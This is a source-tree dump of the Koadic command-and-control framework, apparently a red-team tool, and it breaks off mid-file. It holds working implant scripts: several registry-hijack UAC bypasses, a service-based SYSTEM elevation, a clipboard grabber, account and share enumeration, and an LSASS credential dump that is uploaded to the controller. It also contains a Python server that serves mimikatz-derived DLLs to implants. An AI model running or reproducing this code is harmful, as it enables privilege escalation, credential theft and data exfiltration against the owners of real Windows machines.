(c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); 34 | //===============================================================================================// 35 | #endif 36 | //===============================================================================================// 37 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); 34 | 35 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); 36 | 37 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); 38 | 39 | //===============================================================================================// 40 | #endif 41 | //===============================================================================================// 42 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/rdi.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2012 for Windows Desktop 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimishim", "dll\mimishim.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM 19 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM 20 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32 21 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32 22 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64 23 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64 24 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM 25 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM 26 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32 27 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32 28 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64 29 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM 31 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM 32 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 33 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 34 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 35 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 36 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM 37 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM 38 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 39 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 40 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 41 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 42 | EndGlobalSection 43 | GlobalSection(SolutionProperties) = preSolution 44 | HideSolutionNode = FALSE 45 | EndGlobalSection 46 | EndGlobal 47 | -------------------------------------------------------------------------------- /data/bin/mimishim/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from http.server import BaseHTTPRequestHandler, HTTPServer 4 | from emu.powerkatz32 import x32 5 | from emu.powerkatz64 import x64 6 | import base64 7 | 8 | # HTTPRequestHandler class 9 | class testHTTPServer_RequestHandler(BaseHTTPRequestHandler): 10 | 11 | # GET 12 | def do_GET(self): 13 | # Send response status code 14 | self.send_response(200) 15 | 16 | # Send headers 17 | self.send_header('Content-type','text/html') 18 | self.end_headers() 19 | 20 | # Send message back to client 21 | message = "Hello world!" 22 | # Write content as utf-8 data 23 | self.wfile.write(bytes(message, "utf8")) 24 | self.wfile.write(bytes(self.requestline, "utf8")) 25 | return 26 | 27 | def do_POST(self): 28 | # Send response status code 29 | self.send_response(200) 30 | 31 | # Send headers 32 | self.send_header('Content-type','octet/stream') 33 | self.end_headers() 34 | 35 | 36 | if(self.headers['UUIDHEADA'] == 'mimidllx32'): 37 | self.wfile.write(base64.b64decode(x32)) 38 | if(self.headers['UUIDHEADA'] == 'mimidllx64'): 39 | self.wfile.write(base64.b64decode(x64)) 40 | if(self.headers['UUIDHEADA'] == 'mimishimx64'): 41 | with open("mimishimx64.dll", 'rb') as f: 42 | self.wfile.write(f.read()) 43 | return 44 | 45 | def run(): 46 | print('starting server...') 47 | 48 | # Server settings 49 | # Choose port 8080, for port 80, which is normally used for a http server, you need root access 50 | server_address = ('0.0.0.0', 8081) 51 | httpd = HTTPServer(server_address, testHTTPServer_RequestHandler) 52 | print('running server...') 53 | httpd.serve_forever() 54 | 55 | 56 | run() 57 | -------------------------------------------------------------------------------- /data/bin/powerkatz32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/powerkatz32.dll -------------------------------------------------------------------------------- /data/bin/powerkatz64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/powerkatz64.dll -------------------------------------------------------------------------------- /data/bin/shellcode_dotnet2js.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/shellcode_dotnet2js.dll -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_compdefaults.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\ms-settings\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("ComputerDefaults.exe", true); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | var now = new Date().getTime(); 21 | while (new Date().getTime() < now + 10000); 22 | 23 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 24 | { 25 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 26 | } 27 | } 28 | catch (e) 29 | { 30 | Koadic.work.error(e); 31 | } 32 | 33 | Koadic.exit(); 34 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_compmgmtlauncher.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\mscfile\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 14 | 15 | Koadic.shell.run("CompMgmtLauncher.exe", true); 16 | 17 | Koadic.work.report("Completed"); 18 | 19 | var now = new Date().getTime(); 20 | while (new Date().getTime() < now + 10000); 21 | 22 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 23 | { 24 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 25 | } 26 | } 27 | catch (e) 28 | { 29 | Koadic.work.error(e); 30 | } 31 | 32 | Koadic.exit(); 33 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_eventvwr.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | var path = "Software\\Classes\\mscfile\\shell\\open\\command"; 11 | 12 | Koadic.registry.write(Koadic.registry.HKCU, path, "", "~PAYLOAD_DATA~", Koadic.registry.STRING); 13 | 14 | Koadic.shell.run("eventvwr.exe", true); 15 | 16 | Koadic.work.report("Completed"); 17 | 18 | var now = new Date().getTime(); 19 | while (new Date().getTime() < now + 10000); 20 | 21 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 22 | { 23 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 24 | } 25 | } 26 | catch (e) 27 | { 28 | Koadic.work.error(e); 29 | } 30 | 31 | Koadic.exit(); 32 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_eventvwr.vbs: -------------------------------------------------------------------------------- 1 | sub BypassUACEventVwr 2 | Const HKEY_CURRENT_USER = &H80000001 3 | strKeyPath = "Software\Classes\mscfile\shell\open\command" 4 | 5 | Set objRegistry = GetObject("winmgmts:\\.\root\default:StdRegProv") 6 | objRegistry.CreateKey HKEY_CURRENT_USER, strKeyPath 7 | 8 | objRegistry.SetStringValue HKEY_CURRENT_USER, strKeyPath, "", "~PAYLOAD_DATA~" 9 | 10 | KoRunCmd "eventvwr.exe", true 11 | KoSleep 10 12 | end sub 13 | 14 | BypassUACEventVwr 15 | 16 | KoReportWork "Completed" 17 | 18 | KoExit 19 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_fodhelper.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\ms-settings\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("fodhelper.exe", true); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | var now = new Date().getTime(); 21 | while (new Date().getTime() < now + 10000); 22 | 23 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 24 | { 25 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 26 | } 27 | } 28 | catch (e) 29 | { 30 | Koadic.work.error(e); 31 | } 32 | 33 | Koadic.exit(); 34 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_sdclt.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | var path = "Software\\Classes\\exefile\\shell\\runas\\command"; 11 | 12 | var cmd = Koadic.file.getPath("%COMSPEC%"); 13 | Koadic.registry.write(Koadic.registry.HKCU, path, "IsolatedCommand", cmd + " /c ~PAYLOAD_DATA~", Koadic.registry.STRING); 14 | 15 | Koadic.shell.run("sdclt.exe /kickoffelev", true); 16 | 17 | Koadic.work.report("Completed"); 18 | 19 | var now = new Date().getTime(); 20 | while (new Date().getTime() < now + 10000); 21 | 22 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "IsolatedCommand") != 0) 23 | { 24 | Koadic.shell.run("reg delete HKCU\\"+path+" /v IsolatedCommand /f", true); 25 | } 26 | } 27 | catch (e) 28 | { 29 | Koadic.work.error(e); 30 | } 31 | 32 | Koadic.exit(); 33 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_slui.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\exefile\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("fodhelper.exe", true); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | var now = new Date().getTime(); 21 | while (new Date().getTime() < now + 10000); 22 | 23 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 24 | { 25 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 26 | } 27 | } 28 | catch (e) 29 | { 30 | Koadic.work.error(e); 31 | } 32 | 33 | Koadic.exit(); 34 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_systempropertiesadvanced.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var myObject = new ActiveXObject("Scripting.FileSystemObject"); 4 | var myPath = "C:\\Users\\"+ '~USER~' + "\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"; 5 | var dll = '~DLL~'; 6 | myObject.CopyFile (dll, myPath); 7 | myObject.DeleteFile(dll); 8 | Koadic.shell.run("C:\\Windows\\syswow64\\systempropertiesadvanced.exe", true); 9 | var now = new Date().getTime(); 10 | while (new Date().getTime() < now + 10000); 11 | myObject.DeleteFile(myPath); 12 | } 13 | catch (e) 14 | { 15 | Koadic.work.error(e); 16 | } 17 | 18 | Koadic.exit(); 19 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_wsreset.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | 11 | var path = "Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"; 12 | var delegate = Koadic.registry.read(Koadic.registry.HKCU, path, 'DelegateExecute', Koadic.registry.STRING).SValue; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("C:\\Windows\\System32\\wsreset.exe", false); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', delegate, Koadic.registry.STRING); 21 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '', Koadic.registry.STRING); 22 | } 23 | catch (e) 24 | { 25 | Koadic.work.error(e); 26 | } 27 | 28 | Koadic.exit(); 29 | -------------------------------------------------------------------------------- /data/implant/elevate/system_createservice.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | Koadic.shell.run("sc create #random# binpath= \"~PAYLOAD_DATA~\"", true); 4 | Koadic.shell.run("sc start #random#", true); 5 | Koadic.shell.run("sc delete #random#", true); 6 | } 7 | catch (e) 8 | { 9 | Koadic.work.error(e); 10 | } 11 | 12 | Koadic.exit(); 13 | -------------------------------------------------------------------------------- /data/implant/fun/thunderstruck.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var ie = new ActiveXObject("InternetExplorer.Application"); 4 | ie.Visible = 0; 5 | ie.Navigate2("~VIDEOURL~"); 6 | 7 | for (var i = 0; i < 50; ++i) 8 | { 9 | Koadic.WS.SendKeys(String.fromCharCode(0xAF)); 10 | } 11 | 12 | Koadic.shell.run("ping 127.0.0.1 -n ~SECONDS~", false); 13 | ie.Quit(); 14 | } 15 | catch (e) 16 | { 17 | Koadic.work.error(e); 18 | } 19 | Koadic.exit(); 20 | -------------------------------------------------------------------------------- /data/implant/fun/thunderstruck.vbs: -------------------------------------------------------------------------------- 1 | Set ie = CreateObject("InternetExplorer.Application") 2 | ie.Visible = 0 3 | ie.Navigate2 "~VIDEOURL~" 4 | 5 | For i = 0 To 50 6 | kows.SendKeys(chr(&hAF)) 7 | Next 8 | 9 | KoSleep 90 10 | 11 | KoExit 12 | -------------------------------------------------------------------------------- /data/implant/fun/voice.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var voiceObj = new ActiveXObject("sapi.spvoice"); 4 | 5 | for (var i = 0; i < 50; ++i) 6 | { 7 | Koadic.WS.SendKeys(String.fromCharCode(0xAF)); 8 | } 9 | voiceObj.Speak("~MESSAGE~"); 10 | Koadic.work.report(""); 11 | } 12 | catch (e) 13 | { 14 | Koadic.work.error(e); 15 | } 16 | Koadic.exit(); 17 | -------------------------------------------------------------------------------- /data/implant/fun/voice.vbs: -------------------------------------------------------------------------------- 1 | sub DoVoice 2 | dim speechobject 3 | set speechobject=createobject("sapi.spvoice") 4 | 5 | For i = 0 To 50 6 | kows.SendKeys(chr(&hAF)) 7 | Next 8 | 9 | speechobject.speak "~MESSAGE~" 10 | end sub 11 | 12 | DoVoice 13 | KoReportWork "" 14 | KoExit 15 | -------------------------------------------------------------------------------- /data/implant/gather/clipboard.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var html = new ActiveXObject("htmlfile"); 4 | var text = html.parentWindow.clipboardData.getData("text"); 5 | Koadic.work.report(text); 6 | } 7 | catch (e) 8 | { 9 | Koadic.work.error(e) 10 | } 11 | 12 | Koadic.exit(); 13 | -------------------------------------------------------------------------------- /data/implant/gather/clipboard.vbs: -------------------------------------------------------------------------------- 1 | Set objHTML = CreateObject("htmlfile") 2 | text = objHTML.ParentWindow.ClipboardData.GetData("text") 3 | 4 | KoReportWork text 5 | 6 | KoExit 7 | 8 | 'Set ie = CreateObject("InternetExplorer.Application") 9 | 'ie.Visible = 0 10 | 'ie.Navigate2 "C:\Users\David Candy\Desktop\Filter.html" 11 | 'Do 12 | '' wscript.sleep 100 13 | 'Loop until ie.document.readystate = "complete" 14 | 'txt=ie.document.parentwindow.clipboardData.GetData("TEXT") 15 | 'ie.quit 16 | 'If IsNull(txt) = true then 17 | 'outp.writeline "No text on clipboard" 18 | 'else 19 | 'outp.writeline txt 20 | 'End If 21 | -------------------------------------------------------------------------------- /data/implant/gather/comsvcs_lsass.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var headers = {}; 4 | 5 | var res_file = "~DIRECTORY~\\"+Koadic.uuid()+".bin"; 6 | 7 | var lpid = ""; 8 | 9 | if (~LSASSPID~ == 0) 10 | { 11 | lpid = Koadic.process.getPID("lsass.exe"); 12 | if (lpid) 13 | { 14 | Koadic.work.report(lpid.toString(),{'Task': 'pid'}); 15 | } 16 | else 17 | { 18 | Koadic.work.report('',{'Task': 'nopid'}); 19 | var e = Error('Could not identify process ID'); 20 | throw e; 21 | } 22 | } 23 | else 24 | { 25 | lpid = ~LSASSPID~; 26 | } 27 | 28 | var cmd = "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump "+ lpid.toString()+ " " + res_file + " full"; 29 | 30 | Koadic.work.report('',{'Task': 'startrun'}); 31 | var newpid = Koadic.WMI.createProcess(cmd, true); 32 | 33 | /* 34 | we only get a process ID returned, so we have to search through running processes 35 | until we can't find the process anymore. then we'll be able to upload. 36 | */ 37 | var pidflag = true; 38 | while (pidflag) 39 | { 40 | pidflag = false; 41 | var processes = Koadic.process.list(); 42 | var items = new Enumerator(processes); 43 | while (!items.atEnd()) 44 | { 45 | var proc = items.item(); 46 | 47 | try 48 | { 49 | if (proc.ProcessId == newpid) 50 | { 51 | pidflag = true; 52 | break; 53 | } 54 | } catch (e) 55 | { 56 | } 57 | items.moveNext(); 58 | } 59 | } 60 | Koadic.work.report('',{'Task': 'endrun'}); 61 | 62 | Koadic.work.report('',{'Task': 'upload'}); 63 | Koadic.http.upload(res_file, 'dump', ~CERTUTIL~, 'Task'); 64 | 65 | Koadic.work.report('',{'Task': 'delbin'}); 66 | Koadic.file.deleteFile(res_file); 67 | 68 | } 69 | catch (e) 70 | { 71 | Koadic.work.error(e); 72 | } 73 | 74 | Koadic.exit(); 75 | -------------------------------------------------------------------------------- /data/implant/gather/enum_printers.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var WshNetwork = WScript.CreateObject("WScript.Network"); 4 | var oPrinters = WshNetwork.EnumPrinterConnections(); 5 | 6 | var ret = ""; 7 | for (i = 0; i < oPrinters.length; i += 2) 8 | { 9 | ret += oPrinters.Item(i) + " = " + oPrinters.Item(i + 1) + "\n"; 10 | } 11 | 12 | Koadic.work.report(ret); 13 | } 14 | catch (e) 15 | { 16 | Koadic.work.error(e); 17 | } 18 | 19 | Koadic.exit(); -------------------------------------------------------------------------------- /data/implant/gather/enum_shares.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var WshNetwork = WScript.CreateObject("WScript.Network"); 4 | var oDrives = WshNetwork.EnumNetworkDrives(); 5 | 6 | var ret = ""; 7 | for (i = 0; i < oDrives.length; i += 2) 8 | { 9 | ret += oDrives.Item(i) + " = " + oDrives.Item(i + 1) + "\n"; 10 | } 11 | 12 | Koadic.work.report(ret); 13 | } 14 | catch (e) 15 | { 16 | Koadic.work.error(e); 17 | } 18 | 19 | Koadic.exit(); 20 | -------------------------------------------------------------------------------- /data/implant/gather/enum_users.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var computer = "."; 4 | var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\" + computer + "\\root\\cimv2"); 5 | 6 | // https://msdn.microsoft.com/en-us/library/aa394189(v=vs.85).aspx 7 | var sessions = wmi.ExecQuery("Select * from Win32_LogonSession Where LogonType = 2 OR LogonType = 10"); 8 | 9 | if (sessions.Count == 0) 10 | { 11 | Koadic.work.report("No interactive users found.") 12 | } 13 | else 14 | { 15 | for (var e = new Enumerator(sessions); !e.atEnd(); e.moveNext()) 16 | { 17 | var session = e.item(); 18 | 19 | var query = ""; 20 | query += "Associators of {Win32_LogonSession.LogonId=" + session.LogonId; 21 | query += "} Where AssocClass=Win32_LoggedOnUser Role=Dependent"; 22 | var users = wmi.ExecQuery(query); 23 | 24 | for (var f = new Enumerator(users); !f.atEnd(); f.moveNext()) 25 | { 26 | var user = f.item(); 27 | var info = user.Caption; 28 | Koadic.work.report(info); 29 | } 30 | } 31 | } 32 | } catch (e) 33 | { 34 | Koadic.work.error(e); 35 | } 36 | Koadic.work.report("Complete"); 37 | Koadic.exit(); 38 | -------------------------------------------------------------------------------- /data/implant/gather/enum_users.js.old: -------------------------------------------------------------------------------- 1 | function stringify_user(user, loggedOn) 2 | { 3 | var ret = ""; 4 | ret += user.Caption + "\n"; 5 | ret += user.Description + "\n"; 6 | ret += user.InstallDate + "\n"; 7 | ret += user.Name + "\n"; 8 | ret += user.Status + "\n"; 9 | ret += user.StartTime + "\n"; 10 | ret += user.AuthenticationPackage + "\n"; 11 | ret += user.LogonId + "\n"; 12 | ret += user.LogonType + "\n"; 13 | 14 | ret += loggedOn.Properties_; 15 | ret += loggedOn.Name; 16 | ret += loggedOn.Antecedent; 17 | ret += loggedOn.Dependent; 18 | 19 | return ret; 20 | } 21 | 22 | try { 23 | var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); 24 | var columns = wmi.ExecQuery("Select * From Win32_LoggedOnUser"); 25 | 26 | for (var e = new Enumerator(columns); !e.atEnd(); e.moveNext()) 27 | { 28 | var session = e.item(); 29 | var str 